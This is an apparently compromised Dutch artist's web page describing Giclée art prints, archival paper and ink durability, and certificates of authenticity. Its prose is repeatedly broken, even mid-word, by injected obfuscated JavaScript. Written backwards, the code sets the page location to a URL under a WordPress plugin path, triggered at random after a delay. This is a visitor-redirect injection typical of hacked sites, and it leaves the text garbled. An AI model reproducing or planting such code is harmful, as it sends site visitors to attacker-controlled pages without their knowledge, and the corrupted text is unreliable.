Bertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos vervaardigd zijn kunstwerken in aanvang, soms gedeeltelijk, digitaal. Van de gecreëerde beelden worden Giclée afdrukken gemaakt die voldoen aan professionele en internationaal geldende kwaliteitsnormen voor Giclée’s, van oorsprong een druktechniek die is ontwikkeld aan het begin van de jaren ‘90’ en was met name bedoeld voor reproducties van kunstwerken. Waar lithografie vroeger de standaard was voor kunstreproducties is dit nu de Giclée. Het woord Giclée is afkomstig uit het Frans en betekent letterlijk ‘vernevelen’ of ‘spuiten’ zoals nu de techniek van het printen.

Als ondergrond voor de kunstwerken wordt een hoogwaardige drager gebruikt van een stevige kwaliteit met een fijne structuur. Dit speciaal voor kunstprints ontwikkelde materiaal is voorzien van een coating die een duurzame reproductiekwaliteit mogelijk maakt. In combinatie met de hoogwaardige inkten garandeert de fabrikant Epson een houdbaarheid op de lichtechtheid van de kleuren toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot wel 75 jaar. Hiermee wordt voldaan aan de hoge eisen die kunstenaars en kunstverzamelaars stellen aan duurzame kunstreproducties.

Bertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos verstrekt bij de verkoop van de kunstwerken een Certificaat van Authenticiteit met een verklaring dat het kunstwerk voldoet aan de Giclée-reproductienormen en is gesigneerd door de kunstenaar. De kunstwerken vóór 2014 hebben een gelimiteerde oplage van maximaal 5 exemplaren. Deze zijn leverbaar op canvas of in epoxy gegoten en zijn voorzien van een volgnummer. Kunstwerken vanaf 2014 zijn meestal gecombineerd met andere materialen en zijn uniek qua uitvoering.